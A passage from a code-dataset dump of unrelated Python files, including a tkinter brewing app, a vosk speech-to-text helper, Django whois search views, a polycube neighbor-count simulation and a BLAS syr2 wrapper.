xrange(len(shop_category_1st_list))]\n ret[0] = [ i for i in xrange(2,9) ]\n ret[1] = [ i for i in xrange(10,15)]\n ret[2] = [ i for i in xrange(16,26)]\n ret[3] = [ i for i in xrange(27,33)]\n ret[4] = [ i for i in xrange(34,42)]\n ret[5] = [ i for i in xrange(43,50)]\n ret[6] = [ i for i in xrange(51,56)]\n ret[7] = [ i for i in xrange(57,63)]\n ret[8] = [ i for i in xrange(64,69)]\n ret[9] = [ i for i in xrange(70,75)]\n\n return ret\n\ndef get_all_category():\n shop_category_dictionary = get_shop_category_dictionary()\n shop_category_tree = get_shop_category_tree()\n ret_category = []\n for i in xrange(len(shop_category_tree)):\n first_category_id = shop_category_tree[i][0]-1\n first_category_name = shop_category_dictionary[first_category_id]\n second_categories = []\n for j in xrange(len(shop_category_tree[i])):\n second_category_id = shop_category_tree[i][j]\n second_category_name = shop_category_dictionary[second_category_id]\n d = {\n 'category_id': str(second_category_id),\n 'category_name': str(second_category_name)\n }\n second_categories.append(d)\n d = {\n 'category_id': first_category_id,\n 'category_name': first_category_name,\n 'child_categories': second_categories\n }\n ret_category.append(d)\n return ret_category\n\ndef convert_price_to_won(price):\n if str(price).find(',') != -1:\n return price\n reverse_str_price = str(price)[::-1]\n ret = ''\n for i in xrange(len(reverse_str_price)):\n ret = str(reverse_str_price[i])+ret\n next_i = i+1\n if next_i < len(reverse_str_price) and next_i % 3 == 0:\n ret = ','+ret\n return ret\n\n#\n# return { 'si': [(),(),...],\n# 'gu': [(),(),...],\n# 'dong': [(),(),...] }\n#\ndef get_address_list():\n with open('/home/howsmart/howsmart/app/address.json','r') as fp:\n r = json.loads(fp.read())\n ret = {\n 'si': [('전체','전체')],\n 'gu': [('전체','전체')],\n 'dong': [('전체','전체')]\n }\n for si in r:\n ret['si'].append((si['name'],si['name']))\n for gu in si['items']:\n ret['gu'].append((gu['name'],gu['name']))\n for dong in gu['items']:\n ret['dong'].append((dong['name'],dong['name']))\n return ret\n\ndef get_area_name(area_id):\n l = [u'10평대 미만',u'10평대',u'20평대',u'30평대',u'40평대',u'50평대 이상']\n return l[int(area_id)-1];\n\ndef get_price_name(price_id):\n l = [u'5만원 미만',u'5만원 ~ 10만원',u'10만원 ~ 20만원',u'20만원 ~ 50만원',u'50만원 ~ 100만원',u'100만원 이상']\n return l[int(price_id)-1];\n\ndef get_price_range(price_id):\n l = [(0,50000),(50000,100000),(100000,200000),(200000,500000),(500000,1000000),(1000000,50000000)]\n return l[int(price_id)-1];\n","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"476286956","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\nfrom tkinter import ttk\nimport collections\n\nLARGE_FONT = (\"Verdana\", -11)\n\nclass WindowMaker(tk.Tk):\n def __init__(self, *args, **kwargs):\n super().__init__()\n\n self.container = tk.Frame(self)\n #self.container.resizeable (0,0)\n self.container.grid()\n self.container.grid_rowconfigure(0, weight=1)\n self.container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n frame_name = [Information, Tools, Recipes, MainMenu]\n for page in frame_name:\n name=page.__name__\n frame = page(self.container, self)\n self.frames[name] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n def create_buttons(self, text1, text2, text3):\n self.button1 = tk.Label(self, text=text1, bg=\"dim gray\", font=LARGE_FONT)\n self.button2 = tk.Label(self, text=text2, bg=\"dim gray\", font=LARGE_FONT)\n self.button3 = tk.Label(self, text=text3, bg=\"dim gray\", font=LARGE_FONT)\n self.exit_button = tk.Label(self, text=\"Exit\", bg=\"dim gray\", font=LARGE_FONT)\n self.style_menu(text1, text2, text3)\n\n def style_menu(self, text1, text2, text3):\n self.button_navigation = collections.OrderedDict([(text1, self.button1), (\"Save Recipe\", self.button2),\n (\"Load Recipe\", self.button3), (\"Quit\", self.exit_button)])\n\n for value, key in enumerate(self.button_navigation):\n self.button_navigation[key].grid(column=0, row=value)\n self.button_navigation[key].config(height=8, width=24)\n self.button_navigation[key].bind(\"\", lambda event:self.enter_label(event))\n self.button_navigation[key].bind(\"\", lambda event:self.leave_label(event))\n\n def enter_label(self, event):\n event.widget.config(bg=\"gray\")\n\n def leave_label(self, event):\n event.widget.config(bg=\"dim gray\")\n\n def bind_exit(self):\n self.exit_button.bind(\"\", lambda event: self.quit_application())\n\n def bind_main_menu(self):\n self.button1.bind(\"\", lambda event: self.raise_frame(\"MainMenu\"))\n\n def raise_frame(self, page):\n frame = self.frames[page]\n frame.tkraise()\n\n def quit_application(self):\n self.controller.destroy()\n\n\nclass MainMenu(tk.Frame, WindowMaker):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n self.create_buttons(\"Recipes\", \"Information\", \"Tools\")\n self.style_buttons(\"Recipes\", \"Information\", \"Tools\")\n self.beer_images()\n self.bind_exit()\n\n def beer_images(self):\n self.image_path = Image.open(\"beer.jpeg\")\n self.image_file = ImageTk.PhotoImage(self.image_path)\n self.image_label = tk.Label(self, image=self.image_file, borderwidth=0)\n self.image_label.image = self.image_file\n self.image_label.grid(row=0, column=1, rowspan=4)\n\n def style_buttons(self, page_name1, page_name2, page_name3):\n self.button1.bind(\"\", lambda event:self.click_button(event, page_name1))\n self.button2.bind(\"\", lambda event:self.click_button(event, page_name2))\n self.button3.bind(\"\", lambda event:self.click_button(event, page_name3))\n\n def click_button(self, event, page_name):\n if page_name == \"Recipes\":\n self.change_page(page_name)\n elif page_name == \"Information\":\n self.change_page(page_name)\n elif page_name == \"Tools\":\n self.change_page(page_name)\n\n def change_page(self, page_name):\n self.controller.raise_frame(page_name)\n\n\nclass Recipes(tk.Frame, WindowMaker):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n self.create_buttons(\"Main Menu\", \"Save Recipe\", \"Load Recipe\")\n self.button_function = {\"MainMenu\": self.button1, \"Save Recipe\": self.button2, \"Load Recipe\": self.button3}\n self.bind_click_buttons()\n self.bind_main_menu()\n self.bind_exit()\n\n self.malt_entry = tk.Text(self, height=6, width=93)\n self.hops_entry = tk.Text(self, height=6, width=93)\n self.yeast_entry = tk.Text(self, height=6, width=93)\n self.notes_entry = tk.Text(self, height=6, width=93)\n\n self.text_entry_widgets = collections.OrderedDict([(\"Enter Malt Here...\", self.malt_entry), (\"Enter Hops Here...\", self.hops_entry),\n (\"Enter Yeast Here...\", self.yeast_entry), (\"Enter Notes Here...\", self.notes_entry)])\n\n grid=0\n for key in self.text_entry_widgets:\n self.text_widget(self.text_entry_widgets[key], key, grid)\n grid += 1\n\n def text_widget(self, entry, text_displayed, grid):\n entry.insert(\"end\", text_displayed)\n entry.grid(row=grid, column=1)\n\n def bind_click_buttons(self):\n for key, value in self.button_function.items():\n value.bind(\"\", lambda event, key=key: self.click_button(event, key))\n\n def click_button(self, event, key):\n if key == \"MainMenu\":\n self.change_page(key)\n elif key == \"Save Recipe\":\n self.save_recipe()\n elif key == \"Load Recipe\":\n self.load_recipe()\n\n def change_page(self, page_name):\n self.controller.raise_frame(page_name)\n\n def save_recipe(self):\n self.file = filedialog.asksaveasfile(mode=\"w\", defaultextension=\"txt\")\n self.file.close()\n with open(self.file.name, \"w\") as recipe_file:\n for entries in self.text_entry_widgets:\n text_save = self.text_entry_widgets[entries].get(\"1.0\", \"end-1c\")\n recipe_file.write(text_save)\n\n def load_recipe(self):\n self.file_name = filedialog.askopenfilename()\n with open(self.file_name, \"r\") as recipe_file:\n if self.malt_entry.get(\"1.0\", \"end-1c\"):\n self.malt_entry.delete(1.0, \"end\")\n self.malt_entry.insert(\"end\", str(recipe_file.read()))\n\nclass Information(tk.Frame, WindowMaker):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller=controller\n tk.Frame.__init__(self, parent)\n\n self.create_buttons(\"Main Menu\", \"\", \"\")\n self.bind_main_menu()\n\n self.beer_images(\"hops.jpeg\", 0, 1, 2, \"https://byo.com/resources/hops\")\n self.beer_images(\"malt.jpeg\", 0, 2, 2, \"https://byo.com/resources/grains\")\n self.beer_images(\"yeast.jpeg\", 2, 1, 2, \"https://byo.com/resources/yeast\")\n self.beer_images(\"water.jpeg\", 2, 2, 2, \"https://www.google.com.au/search?q=harambe&espv=2&source=lnms&tbm=isch&sa=X&ved=0ahUKEwi3j5OGmpPOAhXDoJQKHYUHD18Q_AUICSgC&biw=1440&bih=664\")\n\n def beer_images(self, file_name, row, col, rspan, url):\n image_path = Image.open(file_name)\n image_file = ImageTk.PhotoImage(image_path)\n image_label = tk.Label(self, image=image_file, borderwidth=0)\n image_label.image = image_file\n image_label.bind(\"\", lambda event: webbrowser.open(url))\n image_label.grid(row=row, column=col, rowspan=rspan)\n\n\nclass Tools(tk.Frame, WindowMaker):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n print(\"You are in the info page\")\n self.create_buttons(\"ABV Calculator\", \"IBU Calculator\", \"Strike Water Calculator\")\n self.bind_main_menu()\n self.bind_exit()\n\n\n\nif __name__ == '__main__':\n app = WindowMaker()\n app.resizable(width=False, height=False)\n app.title(\"Brewing App\")\n app.geometry(\"830x440\")\n app.mainloop()\n","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":7778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"149796408","text":"import tkinter.scrolledtext as s\nfrom tkinter import END\nimport re\nMEETING = \"Welcome to my application I hope you enjoy it. For any questions you can write me on my email: il.vsl0110@gmail.com \\n\"\n\nclass Console:\n namespace = None\n def __init__(self, hero):\n self.curr_val = []\n self.pre_string = None\n self.hero = hero\n self.namespace = hero.vars\n self.txt = s.ScrolledText(width=100, height=15)\n self.txt.insert(1.0, MEETING)\n self.txt.bind('', lambda x: self.get_vals(x, self.curr_val if (len(self.curr_val) > 0) else None, self.namespace))\n def write(self, text):\n self.txt.insert(float(len(self.txt.get('1.0', END))), text)\n\n def get_string(self):\n return self.txt.get('1.0', END)\n\n def get_vals(self, event, names, namespace):\n self.namespace = namespace\n if names != None:\n a = self.txt.get('1.0', END)\n data = []\n for i in a.split():\n if not i in self.pre_string:\n data.append(i)\n for i in range(len(data)):\n namespace.set_var(names[i], data[i])\n self.curr_val = []\n else:\n a = self.txt.get('1.0', END).split('\\n')[-2]\n if a == 'cls':\n self.txt.delete('1.0', END)\n def destroy(self):\n self.txt.destroy()","sub_path":"Console.py","file_name":"Console.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"255155965","text":"from vosk import Model, KaldiRecognizer, SetLogLevel\nimport subprocess\nimport json\n\ndef speech_to_text(filename, model_dir='model'):\n SetLogLevel(0)\n sample_rate = 16000\n model = Model(model_dir)\n rec = KaldiRecognizer(model, sample_rate)\n\n process = subprocess.Popen(['ffmpeg', '-loglevel', 'quiet', '-i',\n filename,\n '-ar', str(sample_rate), '-ac', '1', '-f', 's16le', '-'],\n stdout=subprocess.PIPE)\n\n ret = []\n while True:\n data = process.stdout.read(4000)\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n r = rec.Result()\n ret.append(r)\n else:\n r = rec.PartialResult()\n ret.append(r)\n ret.append(rec.FinalResult())\n\n ret = [json.loads(i) for i in ret]\n ret = [i for i in ret if 'result' in i]\n ret = [i['text'] for i in ret]\n\n result_string = '. '.join(ret)\n return result_string","sub_path":"speech_recognizer/spech2text.py","file_name":"spech2text.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"542726417","text":"## Imports\nfrom flask import Flask, render_template, request\nfrom contact import contactPage\nfrom search import searchPage\n\n\n## Register the Contact Form in the Main\napp = Flask(__name__)\napp.register_blueprint(contactPage, url_prefix=\"\")\napp.register_blueprint(searchPage, url_prefix=\"\")\n\n@app.errorhandler(404) \ndef invalid_route(e): \n return render_template('404.html') \nif __name__ == '__main__':\n app.run(debug=True,threaded=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"62186000","text":"import re\r\n\r\nfrom django.shortcuts import render, get_object_or_404, render_to_response\r\nfrom django.http import Http404\r\nfrom django.core import serializers\r\n\r\n# Create your views here.\r\n\r\nfrom django.http import HttpResponse\r\nfrom django.views.generic import ListView, TemplateView\r\nfrom django.core.paginator import PageNotAnInteger, Paginator, EmptyPage\r\n\r\nfrom .models import Information\r\n\r\n\r\nclass IndexView(TemplateView):\r\n template_name = 'search/index.html'\r\n\r\nclass AboutView(TemplateView):\r\n template_name = 'search/about.html'\r\n\r\nclass InstructionView(TemplateView):\r\n template_name = 'search/instruction.html'\r\n\r\ndef search_list(request):\r\n search_key = request.GET.get('search_key')\r\n search_type = request.GET.get('search_type')\r\n\r\n # Get Search Type and Values\r\n if request.method == 'POST' and len(request.POST['search_values']) > 0:\r\n search_values = request.POST['search_values']\r\n try:\r\n matchObj = re.match(r\"^([^=]+)=([^\\n]+)\", search_values)\r\n search_type = matchObj.group(1)\r\n search_key = matchObj.group(2)\r\n except:\r\n error = {'message': '无法理解你的意思呢...'}\r\n return render(request, 'search/index.html', {'error': error})\r\n\r\n if search_type == 'ip':\r\n whois = Information.objects(inetnum__icontains=search_key) # 不区分大小写的包含匹配\r\n elif search_type == 'netname':\r\n whois = Information.objects(netname__icontains=search_key)\r\n elif search_type == 'country':\r\n whois = Information.objects(country__iexact=search_key) # 不区分大小写的完全匹配\r\n elif search_type == 'source':\r\n whois = Information.objects(source__iexact=search_key)\r\n elif search_type == 'descr':\r\n whois = Information.objects(descr__icontains=search_key)\r\n else:\r\n whois = Information.objects.all()\r\n paginator = Paginator(whois, 25) # Show 25 contacts per page\r\n page = request.GET.get('page')\r\n try:\r\n contacts = paginator.page(page)\r\n except PageNotAnInteger:\r\n # If page is not an integer, deliver first page.\r\n contacts = paginator.page(1)\r\n except EmptyPage:\r\n # If page is out of range (e.g. 9999), deliver last page of results.\r\n contacts = paginator.page(paginator.num_pages)\r\n return render_to_response('search/search_list.html',\r\n {\"contacts\": contacts, 'search_key': search_key, 'search_type': search_type})\r\n","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"345317522","text":"# todo: approximate (using Monte-Carlo method) and plot the distribution of number_of_neighbors as a function of the number_of_elements\n\nimport queue\nimport random\nimport sys\nfrom multiprocessing import Pool\n\nimport numpy as np\n\nfrom aggregate import AGGREGATE\n\ndebug = True\nBLOCK = 1\nAIR = 2\n\n\nclass Air(object):\n AIR_UNKOWN = 1\n AIR_EXTERNAL = 2\n AIR_INTERNAL = 3\n\n def __init__(self, position):\n self.position = position # a tuple of (x,y,z)\n self.type = Air.AIR_UNKOWN\n\n\nclass Block(object):\n def __init__(self, position, connections):\n self.position = position # a tuple of (x,y,z)\n self.connections = connections # a list of tuples of (x,y,z) positions of neighboring cubes\n self.connection_count = len(self.connections)\n\n\ndef get_aggregate(node_cnt):\n return AGGREGATE(None, [None], node_cnt, no_sim=True).tree\n\n\ndef compute_interior_nodes(node_cnt):\n # get the structure\n structure = get_aggregate(node_cnt)\n\n # find bounding box\n x_max_node = None\n x_min, x_max = 0, 0\n y_min, y_max = 0, 0\n z_min, z_max = 0, 0\n\n for x, y, z in structure:\n # print(x,y,z)\n if x < x_min:\n x_min = x\n elif x >= x_max:\n x_max = x\n x_max_node = (x, y, z)\n\n if y < y_min:\n y_min = y\n elif y > y_max:\n y_max = y\n\n if z < z_min:\n z_min = z\n elif z > z_max:\n z_max = z\n # print(x_min, x_max)\n # print(y_min, y_max)\n # print(z_min, z_max)\n\n # calc size of matrix\n x_size = x_max - x_min + 3\n y_size = y_max - y_min + 3\n z_size = z_max - z_min + 3\n\n # compute offsets\n x_offset = -1 * x_min + 1\n y_offset = -1 * y_min + 1\n z_offset = -1 * z_min + 1\n\n # reserve matrix\n matrix = np.zeros(shape=(x_size, y_size, z_size), dtype=object)\n\n node_queue_1 = queue.Queue() # queue of Block Objects\n node_queue_2 = queue.Queue() # queue of Block Objects\n\n air_queue = queue.Queue() # queue of Air Objects\n\n to_evaluate_queue = queue.Queue() # queue of tuples of coordinates\n\n # Add connection to parent node for each node. Runs in O(36n)=O(n) time\n for node in structure:\n for child in structure[node]: # max of 6 children\n if node not in structure[child]: # list so traverse; max of 6 connections.\n structure[child].append(node)\n\n # fill in the matrix with nodes & fill queues with nodes\n for x, y, z in structure:\n node = (x + x_offset, y + y_offset, z + z_offset)\n # print(node)\n tmp = Block(node, structure[(x,y,z)])\n matrix[node] = (BLOCK, tmp)\n node_queue_1.put(node) # used to construct neighboring air search space\n node_queue_2.put(tmp) # used to determine interior nodes\n # print(matrix)\n\n # Add air nodes to matrix + fill air_queue\n while not node_queue_1.empty():\n node = node_queue_1.get()\n x, y, z = node\n\n # add neighboring cells to air queue if they are empty and valid cells.\n # x neighbors\n for i in range(-1, 2):\n for j in range(-1, 2):\n for k in range(-1, 2):\n if x + i < 0 or x + i >= x_size:\n continue\n if y + j < 0 or y + j >= y_size:\n continue\n if z + k < 0 or z + k >= z_size:\n continue\n if matrix[x + i, y + j, z + k] != 0:\n continue\n # create new Air Object + add to queue and matrix\n tmp_air = Air((x + i, y + j, z + k))\n air_queue.put(tmp_air)\n matrix[(x + i, y + j, z + k)] = (AIR, tmp_air)\n\n\n # determine which node is guarenteed to be an exterior node. Start here\n x, y, z = x_max_node\n node = (x + x_offset+1, y + y_offset, z + z_offset)\n # print(\"shape\", matrix.shape)\n # print(x_max_node)\n # print(\"Priming: %s to be AIR_EXTERNAL\"%str(node))\n tmp_air = matrix[node]\n tmp_air[1].type = Air.AIR_EXTERNAL\n to_evaluate_queue.put(tmp_air[1])\n\n continue_looping = not to_evaluate_queue.empty()\n # flood local air to determine which cells are external air\n while continue_looping:\n curr_cell = to_evaluate_queue.get()\n # print(\"evaluating: %s\" %str(curr_cell.position))\n x, y, z = curr_cell.position\n\n # x neighbors\n for i in [-1, 1]:\n if x + i < 0 or x + i >= x_size:\n # print(\"out of scope\")\n continue\n cell = matrix[x + i, y, z]\n if cell == 0 or cell[0] == BLOCK or cell[1].type == Air.AIR_EXTERNAL:\n # print(cell)\n # print(\"not unknown air.\")\n continue\n cell[1].type = Air.AIR_EXTERNAL\n to_evaluate_queue.put(cell[1])\n\n # y neighbors\n for i in [-1, 1]:\n if y + i < 0 or y + i >= y_size:\n # print(\"out of scope\")\n continue\n cell = matrix[x, y + i, z]\n if cell == 0 or cell[0] == BLOCK or cell[1].type == Air.AIR_EXTERNAL:\n # print(cell)\n # print(\"not unknown air.\")\n continue\n\n cell[1].type = Air.AIR_EXTERNAL\n to_evaluate_queue.put(cell[1])\n\n # z neighbors\n for i in [-1, 1]:\n if z + i < 0 or z + i >= z_size:\n # print(\"out of scope\")\n continue\n cell = matrix[x, y, z + i]\n if cell == 0 or cell[0] == BLOCK or cell[1].type == Air.AIR_EXTERNAL:\n # print(cell)\n # print(\"not unknown air.\")\n continue\n cell[1].type = Air.AIR_EXTERNAL\n\n to_evaluate_queue.put(cell[1])\n continue_looping = not to_evaluate_queue.empty()\n\n node_neighbor_cnt_queue = queue.Queue()\n\n while not node_queue_2.empty():\n curr_cell = node_queue_2.get()\n # print(\"Considering:\", curr_cell.position)\n x, y, z = curr_cell.position\n\n # x neighbors\n for i in [-1, 1]:\n if x + i < 0 or x + i >= x_size:\n continue\n cell = matrix[x + i, y, z]\n if debug:\n assert cell != 1, \"Invalid cell type.\"\n if cell[0] == AIR and cell[1].type != Air.AIR_EXTERNAL:\n # print(cell[1].position, cell[1].type)\n curr_cell.connection_count += 1\n\n # y neighbors\n for i in [-1, 1]:\n if y + i < 0 or y + i >= y_size:\n continue\n cell = matrix[x, y + i, z]\n if debug:\n assert cell != 1, \"Invalid cell type.\"\n if cell[0] == AIR and cell[1].type != Air.AIR_EXTERNAL:\n # print(cell[1].position, cell[1].type)\n curr_cell.connection_count += 1\n\n # z neighbors\n for i in [-1, 1]:\n if z + i < 0 or z + i >= x_size:\n continue\n cell = matrix[x, y, z + i]\n if debug:\n assert cell != 1, \"Invalid cell type.\"\n if cell[0] == AIR and cell[1].type != Air.AIR_EXTERNAL:\n # print(cell[1].position, cell[1].type)\n curr_cell.connection_count += 1\n\n node_neighbor_cnt_queue.put(curr_cell.connection_count)\n\n neighbor_frequencies = np.zeros(shape=6)\n while not node_neighbor_cnt_queue.empty():\n neighbor_cnt = node_neighbor_cnt_queue.get()\n if neighbor_cnt == 0:\n continue\n neighbor_frequencies[neighbor_cnt - 1] += 1\n\n return neighbor_frequencies\n\n\ndef get_neighbor_counts(node_cnt):\n # generate aggregate\n structure = get_aggregate(node_cnt)\n\n # remove the origin. Each node has 1 parent except the origin which has none.\n origin = structure.pop((0, 0, 0))\n\n # calculate neighbor counts\n # each node has 1 parent with the exception of the origin which has 0 parents.\n neighbor_counts = [len(d) + 1 for d in\n structure.values()]\n # add the origin back in\n neighbor_counts.append(len(origin))\n\n # if in debug, assert truth values\n if debug:\n if node_cnt > 1:\n assert (min(neighbor_counts) > 0), \"Error with generating polycube\"\n else:\n assert (min(neighbor_counts) >= 0), \"Error with generating polycube\"\n assert (max(neighbor_counts) < 7), \"Error with generating polycube\"\n\n # calculate neighbor frequencies\n neighbor_frequencies = np.zeros(shape=6)\n # print(neighbor_counts)\n for n in neighbor_counts:\n if n == 0:\n continue\n neighbor_frequencies[n - 1] += 1\n return neighbor_frequencies\n\n\ndef compute_work(node_cnt, iteration_number, ttl_iteration_cnt, seed_offset=0):\n \"\"\"\n wrapper method for get_neighbor_counts which also sets the seed + keeps track of which iteration this is.\n :param node_cnt: number of nodes to include in our polynode\n :param iteration_number: which iteration we are running\n :param ttl_iteration_cnt: total number of iterations we plan to run. Needed for seeding calculations\n :param seed_offset: how to adjust the seed.\n :return: tuple of node_cnt, iteration_number, and the frequency of num neighbors\n \"\"\"\n # TODO: Decide if this seeding is good or not.\n random.seed(seed_offset + iteration_number + node_cnt * ttl_iteration_cnt)\n neighbor_frequencies = compute_interior_nodes(node_cnt)\n neighbor_frequencies /= node_cnt\n return node_cnt, iteration_number, neighbor_frequencies\n\n\nif __name__ == \"__main__\":\n # compute_interior_nodes(10)\n # exit(0)\n assert len(\n sys.argv) >= 3, \"Please run as python NAME.py \" \\\n \"\"\n num_iterations = int(sys.argv[2])\n ttl_node_count = int(sys.argv[1])\n\n # num_iterations = 1\n # ttl_node_count = 4\n if len(sys.argv) == 4:\n global_seed_offset = int(sys.argv[3])\n else:\n global_seed_offset = 0\n\n np.set_printoptions(suppress=True, formatter={'float_kind': lambda x: '%5.2f' % x})\n\n data = np.zeros(shape=(num_iterations, 6))\n\n # used for parallel computation\n process_count = 12\n pool = Pool(processes=process_count)\n\n # compute the work\n iterations_list = range(num_iterations)\n res = [pool.apply_async(compute_work, args=(ttl_node_count, iter_num, num_iterations, global_seed_offset)) for iter_num in iterations_list]\n for n, r in enumerate(res):\n node_count, iter_num, ret = r.get()\n data[iter_num] = ret\n if n%1000 == 0:\n sys.stdout.write(\"/n%d/n\"%(n//1000))\n sys.stdout.flush()\n pool.close()\n pool.join()\n \n import pickle\n with open(\"%d_cubes_%d_iterations.p\"%(ttl_node_count, num_iterations), \"wb\") as f:\n pickle.dump(data, f)\n","sub_path":"approx_dist_of_num_of_neighbors.py","file_name":"approx_dist_of_num_of_neighbors.py","file_ext":"py","file_size_in_byte":10936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"943270","text":"\"\"\"\n\n Copyright (c) 2014-2015-2015, The University of Texas at Austin.\n All rights reserved.\n\n This file is part of BLASpy and is available under the 3-Clause\n BSD License, which can be found in the LICENSE file at the top-level\n directory or at http://opensource.org/licenses/BSD-3-Clause\n\n\"\"\"\n\nfrom ..helpers import (get_vector_dimensions, get_square_matrix_dimension, get_cblas_info,\n check_equal_sizes, create_zero_matrix, convert_uplo, ROW_MAJOR)\nfrom ctypes import c_int, POINTER\n\n\ndef syr2(x, y, A=None, uplo='u', alpha=1.0, lda=None, inc_x=1, inc_y=1):\n \"\"\"\n Perform a symmetric rank-2 update operation.\n\n A := A + alpha * x * y_T + alpha * y * x_T\n\n where alpha is a scalar, A is a symmetric matrix, and x and y are general column vectors.\n\n The uplo argument indicates whether the lower or upper triangle of A is to be referenced and\n updated by the operation.\n\n Vectors x and y can be passed in as either row or column vectors. If necessary, an implicit\n transposition occurs.\n\n If matrix A is not provided, a zero matrix of the appropriate size and type is created\n and returned. In such a case, lda is automatically set to the number of columns in the\n newly created matrix A.\n\n Args:\n x: 2D NumPy matrix or ndarray representing vector x\n y: 2D NumPy matrix or ndarray representing vector y\n\n --optional arguments--\n\n A: 2D NumPy matrix or ndarray representing matrix A\n < default is the zero matrix >\n uplo: 'u' if the upper triangle of A is to be used\n 'l' if the lower triangle of A is to be used\n < default is 'u' >\n alpha: scalar alpha\n < default is 1.0 >\n lda: leading dimension of A (must be >= # of cols in A)\n < default is the number of columns in A >\n inc_x: stride of x (increment for the elements of x)\n < default is 1 >\n inc_y: stride of y (increment for the elements of y)\n < default is 1 >\n\n Returns:\n Matrix A (which is also overwritten)\n\n Raises:\n ValueError: if any of the following conditions occur:\n - A, x, or y is not a 2D NumPy ndarray or NumPy matrix\n - A, x, and y do not have the same dtype or that dtype is not supported\n - x or y is not a vector\n - the effective length of either x or y does not conform to the dimensions of A\n - uplo is not equal to one of the following: 'u', 'U', 'l', 'L'\n \"\"\"\n\n # get the dimensions of the parameters\n m_x, n_x, x_length = get_vector_dimensions('x', x, inc_x)\n m_y, n_y, y_length = get_vector_dimensions('y', y, inc_y)\n\n # if no matrix A is given, create a zero matrix of appropriate size with the same dtype as x\n if A is None:\n A = create_zero_matrix(x_length, x_length, x.dtype, type(x))\n lda = None\n\n # continue getting dimensions of the parameters\n dim_A = get_square_matrix_dimension('A', A)\n\n # assign a default value to lda if necessary (assumes row-major order)\n if lda is None:\n lda = dim_A\n\n # ensure the parameters are appropriate for the operation\n check_equal_sizes('A', dim_A, 'x', x_length)\n check_equal_sizes('A', dim_A, 'y', y_length)\n\n # convert to appropriate CBLAS value\n cblas_uplo = convert_uplo(uplo)\n\n # determine which CBLAS subroutine to call and which ctypes data type to use\n cblas_func, data_type = get_cblas_info('syr2', (A.dtype, x.dtype, y.dtype))\n\n # create a ctypes POINTER for each vector and matrix\n ctype_x = POINTER(data_type * n_x * m_x)\n ctype_y = POINTER(data_type * n_y * m_y)\n ctype_A = POINTER(data_type * dim_A * dim_A)\n\n # call CBLAS using ctypes\n cblas_func.argtypes = [c_int, c_int, c_int, data_type, ctype_x, c_int, ctype_y, c_int,\n ctype_A, c_int]\n cblas_func.restype = None\n cblas_func(ROW_MAJOR, cblas_uplo, dim_A, alpha, x.ctypes.data_as(ctype_x), inc_x,\n y.ctypes.data_as(ctype_y), inc_y, A.ctypes.data_as(ctype_A), lda)\n\n return A # A is also overwritten, so only useful if no A was provided","sub_path":"blaspy/level_2/syr2.py","file_name":"syr2.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"487032786","text":"import sys\nimport os\n\nfolder = sys.argv[1]\nfiles = os.listdir(folder)\ngroups = [\"first\", \"second\", \"third\"]\ncounter = -1\ndivider = len(files) / 3 + 1\nfor file in files:\n\tif os.path.isdir(folder + \"/\" + file):\n\t\tcontinue\n\tcounter += 1\n\twith open(folder + \"/\" + file) as f:\n\t\tlines = f.readlines()\n\t\tlines = [x.strip() for x in lines]\n\t\tfolderName = groups[counter / divider]\n\t\tif not os.path.exists(folder + \"/\" + folderName):\n\t\t\tos.makedirs(folder + \"/\" + folderName)\n\t\tcount = 0\n\t\tfor line in lines:\n\t\t\tif line.split(\",\")[0] == 'id':\n\t\t\t\tcount = 1\n\t\t\t\tfilename = line.split(\",\")[1]\n\t\t\telif count == 0:\n\t\t\t\tbreak\n\t\t\twith open(folder + \"/\" + folderName + \"/\" + filename, 'a+') as tempFile:\n\t\t\t\ttempFile.write(line + \"\\n\");","sub_path":"DataScripts/downloadScripts/splitPlaysByGames.py","file_name":"splitPlaysByGames.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
